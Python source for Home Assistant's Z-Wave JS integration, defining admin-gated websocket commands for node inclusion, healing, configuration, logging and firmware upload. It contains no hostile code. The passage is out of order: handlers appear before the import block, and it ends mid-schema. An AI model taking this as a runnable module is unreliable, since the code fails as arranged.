        entry = hass.config_entries.async_get_entry(config_entry_id)
        client: Client = hass.data[DOMAIN][config_entry_id][DATA_CLIENT]
        node = client.driver.controller.nodes.get(int(node_id))
        if not node:
            raise web_exceptions.HTTPNotFound

        # Increase max payload
        request._client_max_size = 1024 * 1024 * 10  # pylint: disable=protected-access

        data = await request.post()

        if "file" not in data or not isinstance(data["file"], web_request.FileField):
            raise web_exceptions.HTTPBadRequest

        uploaded_file: web_request.FileField = data["file"]

        try:
            # File read happens in the executor to avoid blocking the loop.
            await begin_firmware_update(
                entry.data[CONF_URL],
                node,
                uploaded_file.filename,
                await hass.async_add_executor_job(uploaded_file.file.read),
                async_get_clientsession(hass),
            )
        except BaseZwaveJSServerError as err:
            raise web_exceptions.HTTPBadRequest from err

        return self.json(None)
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/check_for_config_updates",
        vol.Required(ENTRY_ID): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_check_for_config_updates(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Check for config updates."""
    update = await client.driver.async_check_for_config_updates()
    # Report availability and, when present, the new version string.
    payload = {
        "update_available": update.update_available,
        "new_version": update.new_version,
    }
    connection.send_result(msg[ID], payload)
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/install_config_update",
        vol.Required(ENTRY_ID): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_install_config_update(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Install an available configuration (device database) update.

    Fix: the original docstring read "Check for config updates." — copied
    from the sibling handler — while this command installs the update.
    """
    # The driver reports whether the installation succeeded.
    success = await client.driver.async_install_config_update()
    connection.send_result(msg[ID], success)
from __future__ import annotations
import dataclasses
from functools import partial, wraps
import json
from typing import Any, Callable
from aiohttp import hdrs, web, web_exceptions, web_request
import voluptuous as vol
from zwave_js_server import dump
from zwave_js_server.client import Client
from zwave_js_server.const import CommandClass, LogLevel
from zwave_js_server.exceptions import (
BaseZwaveJSServerError,
FailedCommand,
InvalidNewValue,
NotFoundError,
SetValueFailed,
)
from zwave_js_server.firmware import begin_firmware_update
from zwave_js_server.model.firmware import (
FirmwareUpdateFinished,
FirmwareUpdateProgress,
)
from zwave_js_server.model.log_config import LogConfig
from zwave_js_server.model.log_message import LogMessage
from zwave_js_server.model.node import Node
from zwave_js_server.util.node import async_set_config_parameter
from homeassistant.components import websocket_api
from homeassistant.components.http.view import HomeAssistantView
from homeassistant.components.websocket_api.connection import ActiveConnection
from homeassistant.components.websocket_api.const import (
ERR_NOT_FOUND,
ERR_NOT_SUPPORTED,
ERR_UNKNOWN_ERROR,
)
from homeassistant.config_entries import ConfigEntry, ConfigEntryState
from homeassistant.const import CONF_URL
from homeassistant.core import HomeAssistant, callback
from homeassistant.exceptions import Unauthorized
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.helpers.device_registry import DeviceEntry
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from .const import (
CONF_DATA_COLLECTION_OPTED_IN,
DATA_CLIENT,
DATA_UNSUBSCRIBE,
DOMAIN,
EVENT_DEVICE_ADDED_TO_REGISTRY,
)
from .helpers import async_enable_statistics, update_data_collection_preference
from .services import BITMASK_SCHEMA
# Websocket message / schema keys shared by the command handlers below.
ID = "id"
ENTRY_ID = "entry_id"
ERR_NOT_LOADED = "not_loaded"
NODE_ID = "node_id"
COMMAND_CLASS_ID = "command_class_id"
TYPE = "type"
PROPERTY = "property"
PROPERTY_KEY = "property_key"
VALUE = "value"
SECURE = "secure"

# Log-config keys.
CONFIG = "config"
LEVEL = "level"
LOG_TO_FILE = "log_to_file"
FILENAME = "filename"
ENABLED = "enabled"  # fix: was assigned twice; duplicate removed
FORCE_CONSOLE = "force_console"

# Config-parameter result keys.
VALUE_ID = "value_id"
STATUS = "status"

# Data-collection keys.
OPTED_IN = "opted_in"
def async_get_entry(orig_func: Callable) -> Callable:
    """Decorate a websocket handler to resolve the config entry and client.

    Sends an error reply (and skips the handler) when the entry is missing
    or not loaded; otherwise calls
    ``orig_func(hass, connection, msg, entry, client)``.
    """

    @wraps(orig_func)
    async def async_get_entry_func(
        hass: HomeAssistant, connection: ActiveConnection, msg: dict
    ) -> None:
        """Provide the config entry and client to the wrapped handler."""
        entry_id = msg[ENTRY_ID]
        entry = hass.config_entries.async_get_entry(entry_id)
        if entry is None:
            connection.send_error(
                msg[ID], ERR_NOT_FOUND, f"Config entry {entry_id} not found"
            )
            return
        if entry.state is not ConfigEntryState.LOADED:
            connection.send_error(
                msg[ID], ERR_NOT_LOADED, f"Config entry {entry_id} not loaded"
            )
            return
        client = hass.data[DOMAIN][entry_id][DATA_CLIENT]
        await orig_func(hass, connection, msg, entry, client)

    return async_get_entry_func
def async_get_node(orig_func: Callable) -> Callable:
    """Decorate a websocket handler to resolve the target node.

    Builds on ``async_get_entry``; sends ERR_NOT_FOUND when the node id is
    unknown, otherwise calls ``orig_func(hass, connection, msg, node)``.
    """

    @async_get_entry
    @wraps(orig_func)
    async def async_get_node_func(
        hass: HomeAssistant,
        connection: ActiveConnection,
        msg: dict,
        entry: ConfigEntry,
        client: Client,
    ) -> None:
        """Provide the node to the wrapped handler."""
        node_id = msg[NODE_ID]
        node = client.driver.controller.nodes.get(node_id)
        if node is None:
            connection.send_error(msg[ID], ERR_NOT_FOUND, f"Node {node_id} not found")
            return
        await orig_func(hass, connection, msg, node)

    return async_get_node_func
def async_handle_failed_command(orig_func: Callable) -> Callable:
    """Decorate a websocket handler to translate FailedCommand into an error reply."""

    @wraps(orig_func)
    async def async_handle_failed_command_func(
        hass: HomeAssistant,
        connection: ActiveConnection,
        msg: dict,
        *args: Any,
        **kwargs: Any,
    ) -> None:
        """Run the handler and catch FailedCommand from the driver."""
        try:
            await orig_func(hass, connection, msg, *args, **kwargs)
        except FailedCommand as err:
            # Tear down any event subscriptions the handler registered
            # before the command failed.
            if unsubs := msg.get(DATA_UNSUBSCRIBE):
                for unsub in unsubs:
                    unsub()
            connection.send_error(msg[ID], err.error_code, err.args[0])

    return async_handle_failed_command_func
@callback
def async_register_api(hass: HomeAssistant) -> None:
    """Register all of the Z-Wave JS websocket commands and HTTP views."""
    # All websocket handlers are registered the same way; iterate instead of
    # repeating the call once per handler.
    for command_handler in (
        websocket_network_status,
        websocket_node_status,
        websocket_node_state,
        websocket_node_metadata,
        websocket_ping_node,
        websocket_add_node,
        websocket_stop_inclusion,
        websocket_stop_exclusion,
        websocket_remove_node,
        websocket_remove_failed_node,
        websocket_replace_failed_node,
        websocket_begin_healing_network,
        websocket_subscribe_heal_network_progress,
        websocket_stop_healing_network,
        websocket_refresh_node_info,
        websocket_refresh_node_values,
        websocket_refresh_node_cc_values,
        websocket_heal_node,
        websocket_set_config_parameter,
        websocket_get_config_parameters,
        websocket_subscribe_log_updates,
        websocket_update_log_config,
        websocket_get_log_config,
        websocket_update_data_collection_preference,
        websocket_data_collection_status,
        websocket_version_info,
        websocket_abort_firmware_update,
        websocket_subscribe_firmware_update_status,
        websocket_check_for_config_updates,
        websocket_install_config_update,
    ):
        websocket_api.async_register_command(hass, command_handler)
    hass.http.register_view(DumpView())
    hass.http.register_view(FirmwareUploadView())
@websocket_api.require_admin
@websocket_api.websocket_command(
    {vol.Required(TYPE): "zwave_js/network_status", vol.Required(ENTRY_ID): str}
)
@websocket_api.async_response
@async_get_entry
async def websocket_network_status(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Return the status of the Z-Wave JS client and controller."""
    controller = client.driver.controller
    data = {
        # Connection-level information about the websocket client.
        "client": {
            "ws_server_url": client.ws_server_url,
            "state": "connected" if client.connected else "disconnected",
            "driver_version": client.version.driver_version,
            "server_version": client.version.server_version,
        },
        # Properties reported by the Z-Wave controller itself.
        "controller": {
            "home_id": controller.home_id,
            "library_version": controller.library_version,
            "type": controller.controller_type,
            "own_node_id": controller.own_node_id,
            "is_secondary": controller.is_secondary,
            "is_using_home_id_from_other_network": controller.is_using_home_id_from_other_network,
            "is_sis_present": controller.is_SIS_present,
            "was_real_primary": controller.was_real_primary,
            "is_static_update_controller": controller.is_static_update_controller,
            "is_slave": controller.is_slave,
            "serial_api_version": controller.serial_api_version,
            "manufacturer_id": controller.manufacturer_id,
            "product_id": controller.product_id,
            "product_type": controller.product_type,
            "supported_function_types": controller.supported_function_types,
            "suc_node_id": controller.suc_node_id,
            "supports_timers": controller.supports_timers,
            "is_heal_network_active": controller.is_heal_network_active,
            # Node ids only; full node state is fetched per node.
            "nodes": list(client.driver.controller.nodes),
        },
    }
    connection.send_result(
        msg[ID],
        data,
    )
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/node_status",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    }
)
@websocket_api.async_response
@async_get_node
async def websocket_node_status(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Report a summary of a single node's status to the caller."""
    connection.send_result(
        msg[ID],
        {
            "node_id": node.node_id,
            "is_routing": node.is_routing,
            "status": node.status,
            "is_secure": node.is_secure,
            "ready": node.ready,
        },
    )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/node_state",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    }
)
@websocket_api.async_response
@async_get_node
async def websocket_node_state(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Return the node's raw cached state dict (``node.data``) to the caller."""
    connection.send_result(
        msg[ID],
        node.data,
    )
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/node_metadata",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    }
)
@websocket_api.async_response
@async_get_node
async def websocket_node_metadata(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Report the device-config metadata (manuals, inclusion hints) for a node."""
    metadata = node.device_config.metadata
    connection.send_result(
        msg[ID],
        {
            "node_id": node.node_id,
            "exclusion": metadata.exclusion,
            "inclusion": metadata.inclusion,
            "manual": metadata.manual,
            "wakeup": metadata.wakeup,
            "reset": metadata.reset,
            "device_database_url": node.device_database_url,
        },
    )
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/ping_node",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_ping_node(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Ping the node and relay whether it responded."""
    connection.send_result(msg[ID], await node.async_ping())
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/add_node",
        vol.Required(ENTRY_ID): str,
        vol.Optional(SECURE, default=False): bool,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_add_node(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Start Z-Wave inclusion and stream progress events to the subscriber.

    Forwards controller inclusion events, per-node interview events, and the
    Home Assistant device-registry registration back over the websocket until
    the subscription is cancelled.
    """
    controller = client.driver.controller
    # Controller API takes "include non-secure" while the WS API takes "secure".
    include_non_secure = not msg[SECURE]
    @callback
    def async_cleanup() -> None:
        """Remove all event listeners when the subscription ends."""
        for unsub in unsubs:
            unsub()
    @callback
    def forward_event(event: dict) -> None:
        """Forward a plain controller/node event to the websocket."""
        connection.send_message(
            websocket_api.event_message(msg[ID], {"event": event["event"]})
        )
    @callback
    def forward_stage(event: dict) -> None:
        """Forward an interview-stage event, including the stage name."""
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": event["event"], "stage": event["stageName"]}
            )
        )
    @callback
    def node_added(event: dict) -> None:
        """Subscribe to the new node's interview events and announce it."""
        node = event["node"]
        interview_unsubs = [
            node.on("interview started", forward_event),
            node.on("interview completed", forward_event),
            node.on("interview stage completed", forward_stage),
            node.on("interview failed", forward_event),
        ]
        # Extend the shared list so async_cleanup also removes these listeners.
        unsubs.extend(interview_unsubs)
        node_details = {
            "node_id": node.node_id,
            "status": node.status,
            "ready": node.ready,
        }
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": "node added", "node": node_details}
            )
        )
    @callback
    def device_registered(device: DeviceEntry) -> None:
        """Announce that the new device was added to the device registry."""
        device_details = {
            "name": device.name,
            "id": device.id,
            "manufacturer": device.manufacturer,
            "model": device.model,
        }
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": "device registered", "device": device_details}
            )
        )
    connection.subscriptions[msg["id"]] = async_cleanup
    # Assignment also binds `unsubs`, which the closures above capture.
    msg[DATA_UNSUBSCRIBE] = unsubs = [
        controller.on("inclusion started", forward_event),
        controller.on("inclusion failed", forward_event),
        controller.on("inclusion stopped", forward_event),
        controller.on("node added", node_added),
        async_dispatcher_connect(
            hass, EVENT_DEVICE_ADDED_TO_REGISTRY, device_registered
        ),
    ]
    result = await controller.async_begin_inclusion(include_non_secure)
    connection.send_result(
        msg[ID],
        result,
    )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/stop_inclusion",
        vol.Required(ENTRY_ID): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_stop_inclusion(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Cancel an in-progress inclusion and report the controller's result."""
    stopped = await client.driver.controller.async_stop_inclusion()
    connection.send_result(msg[ID], stopped)
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/stop_exclusion",
        vol.Required(ENTRY_ID): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_stop_exclusion(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Cancel an in-progress exclusion and report the controller's result."""
    stopped = await client.driver.controller.async_stop_exclusion()
    connection.send_result(msg[ID], stopped)
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/remove_node",
        vol.Required(ENTRY_ID): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_remove_node(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Start Z-Wave exclusion and stream progress events to the subscriber."""
    controller = client.driver.controller
    @callback
    def async_cleanup() -> None:
        """Remove all event listeners when the subscription ends."""
        for unsub in unsubs:
            unsub()
    @callback
    def forward_event(event: dict) -> None:
        """Forward a plain controller event to the websocket."""
        connection.send_message(
            websocket_api.event_message(msg[ID], {"event": event["event"]})
        )
    @callback
    def node_removed(event: dict) -> None:
        """Announce which node was removed from the network."""
        node = event["node"]
        node_details = {
            "node_id": node.node_id,
        }
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": "node removed", "node": node_details}
            )
        )
    connection.subscriptions[msg["id"]] = async_cleanup
    # Assignment also binds `unsubs`, which async_cleanup captures.
    msg[DATA_UNSUBSCRIBE] = unsubs = [
        controller.on("exclusion started", forward_event),
        controller.on("exclusion failed", forward_event),
        controller.on("exclusion stopped", forward_event),
        controller.on("node removed", node_removed),
    ]
    result = await controller.async_begin_exclusion()
    connection.send_result(
        msg[ID],
        result,
    )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/replace_failed_node",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
        vol.Optional(SECURE, default=False): bool,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_replace_failed_node(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Replace a failed node in place (remove then re-include) with event stream.

    Subscribes the caller to inclusion progress, node removed/added events,
    interview events for the replacement node, and its device-registry entry.
    """
    controller = client.driver.controller
    # Controller API takes "include non-secure" while the WS API takes "secure".
    include_non_secure = not msg[SECURE]
    node_id = msg[NODE_ID]
    @callback
    def async_cleanup() -> None:
        """Remove all event listeners when the subscription ends."""
        for unsub in unsubs:
            unsub()
    @callback
    def forward_event(event: dict) -> None:
        """Forward a plain controller/node event to the websocket."""
        connection.send_message(
            websocket_api.event_message(msg[ID], {"event": event["event"]})
        )
    @callback
    def forward_stage(event: dict) -> None:
        """Forward an interview-stage event, including the stage name."""
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": event["event"], "stage": event["stageName"]}
            )
        )
    @callback
    def node_added(event: dict) -> None:
        """Subscribe to the replacement node's interview events and announce it."""
        node = event["node"]
        interview_unsubs = [
            node.on("interview started", forward_event),
            node.on("interview completed", forward_event),
            node.on("interview stage completed", forward_stage),
            node.on("interview failed", forward_event),
        ]
        # Extend the shared list so async_cleanup also removes these listeners.
        unsubs.extend(interview_unsubs)
        node_details = {
            "node_id": node.node_id,
            "status": node.status,
            "ready": node.ready,
        }
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": "node added", "node": node_details}
            )
        )
    @callback
    def node_removed(event: dict) -> None:
        """Announce that the failed node was removed."""
        node = event["node"]
        node_details = {
            "node_id": node.node_id,
        }
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": "node removed", "node": node_details}
            )
        )
    @callback
    def device_registered(device: DeviceEntry) -> None:
        """Announce that the replacement device was added to the registry."""
        device_details = {
            "name": device.name,
            "id": device.id,
            "manufacturer": device.manufacturer,
            "model": device.model,
        }
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": "device registered", "device": device_details}
            )
        )
    connection.subscriptions[msg["id"]] = async_cleanup
    # Assignment also binds `unsubs`, which the closures above capture.
    msg[DATA_UNSUBSCRIBE] = unsubs = [
        controller.on("inclusion started", forward_event),
        controller.on("inclusion failed", forward_event),
        controller.on("inclusion stopped", forward_event),
        controller.on("node removed", node_removed),
        controller.on("node added", node_added),
        async_dispatcher_connect(
            hass, EVENT_DEVICE_ADDED_TO_REGISTRY, device_registered
        ),
    ]
    result = await controller.async_replace_failed_node(node_id, include_non_secure)
    connection.send_result(
        msg[ID],
        result,
    )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/remove_failed_node",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_remove_failed_node(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Remove a failed node from the network and notify when it is gone."""
    controller = client.driver.controller
    node_id = msg[NODE_ID]
    @callback
    def async_cleanup() -> None:
        """Remove the event listener when the subscription ends."""
        for unsub in unsubs:
            unsub()
    @callback
    def node_removed(event: dict) -> None:
        """Announce which node was removed from the network."""
        node = event["node"]
        node_details = {
            "node_id": node.node_id,
        }
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": "node removed", "node": node_details}
            )
        )
    connection.subscriptions[msg["id"]] = async_cleanup
    msg[DATA_UNSUBSCRIBE] = unsubs = [controller.on("node removed", node_removed)]
    result = await controller.async_remove_failed_node(node_id)
    connection.send_result(
        msg[ID],
        result,
    )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/begin_healing_network",
        vol.Required(ENTRY_ID): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_begin_healing_network(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Start a network-wide heal and report whether it was started."""
    started = await client.driver.controller.async_begin_healing_network()
    connection.send_result(msg[ID], started)
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/subscribe_heal_network_progress",
        vol.Required(ENTRY_ID): str,
    }
)
@websocket_api.async_response
@async_get_entry
async def websocket_subscribe_heal_network_progress(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Stream heal-network progress/done events to the subscriber."""
    controller = client.driver.controller
    @callback
    def async_cleanup() -> None:
        """Remove the event listeners when the subscription ends."""
        for unsub in unsubs:
            unsub()
    @callback
    def forward_event(key: str, event: dict) -> None:
        """Forward a heal event; `key` selects the per-node status payload."""
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": event["event"], "heal_node_status": event[key]}
            )
        )
    connection.subscriptions[msg["id"]] = async_cleanup
    # Progress events carry "progress"; the final event carries "result".
    msg[DATA_UNSUBSCRIBE] = unsubs = [
        controller.on("heal network progress", partial(forward_event, "progress")),
        controller.on("heal network done", partial(forward_event, "result")),
    ]
    connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/stop_healing_network",
        vol.Required(ENTRY_ID): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_stop_healing_network(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Cancel an in-progress network heal and report the result."""
    stopped = await client.driver.controller.async_stop_healing_network()
    connection.send_result(msg[ID], stopped)
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/heal_node",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_heal_node(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Heal a single node's routes and report whether the heal succeeded."""
    healed = await client.driver.controller.async_heal_node(msg[NODE_ID])
    connection.send_result(msg[ID], healed)
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/refresh_node_info",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    },
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_refresh_node_info(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Re-interview a node and stream interview events to the subscriber."""
    @callback
    def async_cleanup() -> None:
        """Remove the event listeners when the subscription ends."""
        for unsub in unsubs:
            unsub()
    @callback
    def forward_event(event: dict) -> None:
        """Forward a plain interview event to the websocket."""
        connection.send_message(
            websocket_api.event_message(msg[ID], {"event": event["event"]})
        )
    @callback
    def forward_stage(event: dict) -> None:
        """Forward an interview-stage event, including the stage name."""
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": event["event"], "stage": event["stageName"]}
            )
        )
    connection.subscriptions[msg["id"]] = async_cleanup
    # Assignment also binds `unsubs`, which async_cleanup captures.
    msg[DATA_UNSUBSCRIBE] = unsubs = [
        node.on("interview started", forward_event),
        node.on("interview completed", forward_event),
        node.on("interview stage completed", forward_stage),
        node.on("interview failed", forward_event),
    ]
    result = await node.async_refresh_info()
    connection.send_result(msg[ID], result)
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/refresh_node_values",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    },
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_refresh_node_values(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Ask the node to re-report all of its values; reply with no payload."""
    await node.async_refresh_values()
    connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/refresh_node_cc_values",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
        vol.Required(COMMAND_CLASS_ID): int,
    },
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_refresh_node_cc_values(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Refresh the values of a single command class on a node.

    Sends a not-found error if the supplied ID is not a known command class.
    """
    cc_id = msg[COMMAND_CLASS_ID]
    try:
        command_class = CommandClass(cc_id)
    except ValueError:
        # Unknown command class ID: report and bail out.
        connection.send_error(
            msg[ID], ERR_NOT_FOUND, f"Command class {cc_id} not found"
        )
        return
    await node.async_refresh_cc_values(command_class)
    connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/set_config_parameter",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
        vol.Required(PROPERTY): int,
        vol.Optional(PROPERTY_KEY): int,
        vol.Required(VALUE): vol.Any(int, BITMASK_SCHEMA),
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_set_config_parameter(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Set a configuration parameter on a node.

    On success, replies with the affected value ID and the command status;
    on failure, maps the library exception to a websocket error code.
    """
    try:
        zwave_value, cmd_status = await async_set_config_parameter(
            node, msg[VALUE], msg[PROPERTY], property_key=msg.get(PROPERTY_KEY)
        )
    except (InvalidNewValue, NotFoundError, NotImplementedError, SetValueFailed) as err:
        # Translate library errors into the closest websocket error code.
        if isinstance(err, NotFoundError):
            code = ERR_NOT_FOUND
        elif isinstance(err, (InvalidNewValue, NotImplementedError)):
            code = ERR_NOT_SUPPORTED
        else:
            code = ERR_UNKNOWN_ERROR
        connection.send_error(msg[ID], code, str(err))
        return
    connection.send_result(
        msg[ID],
        {
            VALUE_ID: zwave_value.value_id,
            STATUS: cmd_status,
        },
    )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/get_config_parameters",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    }
)
@websocket_api.async_response
@async_get_node
async def websocket_get_config_parameters(
    hass: HomeAssistant, connection: ActiveConnection, msg: dict, node: Node
) -> None:
    """Report all configuration values of a node, keyed by value ID."""
    result = {}
    for value_id, zwave_value in node.get_configuration_values().items():
        meta = zwave_value.metadata
        meta_info = {
            "description": meta.description,
            "label": meta.label,
            "type": meta.type,
            "min": meta.min,
            "max": meta.max,
            "unit": meta.unit,
            "writeable": meta.writeable,
            "readable": meta.readable,
        }
        # Only some parameters define an enumerated state map.
        if meta.states:
            meta_info["states"] = meta.states
        result[value_id] = {
            "property": zwave_value.property_,
            "property_key": zwave_value.property_key,
            "configuration_value_type": zwave_value.configuration_value_type.value,
            "metadata": meta_info,
            "value": zwave_value.value,
        }
    connection.send_result(msg[ID], result)
def filename_is_present_if_logging_to_file(obj: dict) -> dict:
    """Voluptuous validator: require `filename` whenever `log_to_file` is set."""
    if obj.get(LOG_TO_FILE, False) and FILENAME not in obj:
        raise vol.Invalid("`filename` must be provided if logging to file")
    return obj
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/subscribe_log_updates",
        vol.Required(ENTRY_ID): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_subscribe_log_updates(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Stream driver log messages and log-config changes to the subscriber."""
    driver = client.driver
    @callback
    def async_cleanup() -> None:
        """Stop server-side log streaming and remove the listeners."""
        # Fire-and-forget: stop the server's log feed when the client goes away.
        hass.async_create_task(driver.async_stop_listening_logs())
        for unsub in unsubs:
            unsub()
    @callback
    def log_messages(event: dict) -> None:
        """Forward a single driver log line to the websocket."""
        log_msg: LogMessage = event["log_message"]
        connection.send_message(
            websocket_api.event_message(
                msg[ID],
                {
                    "type": "log_message",
                    "log_message": {
                        "timestamp": log_msg.timestamp,
                        "level": log_msg.level,
                        "primary_tags": log_msg.primary_tags,
                        "message": log_msg.formatted_message,
                    },
                },
            )
        )
    @callback
    def log_config_updates(event: dict) -> None:
        """Forward an updated driver log configuration to the websocket."""
        log_config: LogConfig = event["log_config"]
        connection.send_message(
            websocket_api.event_message(
                msg[ID],
                {
                    "type": "log_config",
                    "log_config": dataclasses.asdict(log_config),
                },
            )
        )
    msg[DATA_UNSUBSCRIBE] = unsubs = [
        driver.on("logging", log_messages),
        driver.on("log config updated", log_config_updates),
    ]
    connection.subscriptions[msg["id"]] = async_cleanup
    # Ask the server to start emitting "logging" events before replying.
    await driver.async_start_listening_logs()
    connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/update_log_config",
        vol.Required(ENTRY_ID): str,
        vol.Required(CONFIG): vol.All(
            vol.Schema(
                {
                    vol.Optional(ENABLED): cv.boolean,
                    # Accept any LogLevel value (case-insensitive) and coerce
                    # it to the enum; `vol.In` guarantees `LogLevel(val)`
                    # cannot raise, so passing the enum class directly as the
                    # final validator is equivalent to the lambda it replaces.
                    vol.Optional(LEVEL): vol.All(
                        cv.string,
                        vol.Lower,
                        vol.In([log_level.value for log_level in LogLevel]),
                        LogLevel,
                    ),
                    vol.Optional(LOG_TO_FILE): cv.boolean,
                    vol.Optional(FILENAME): cv.string,
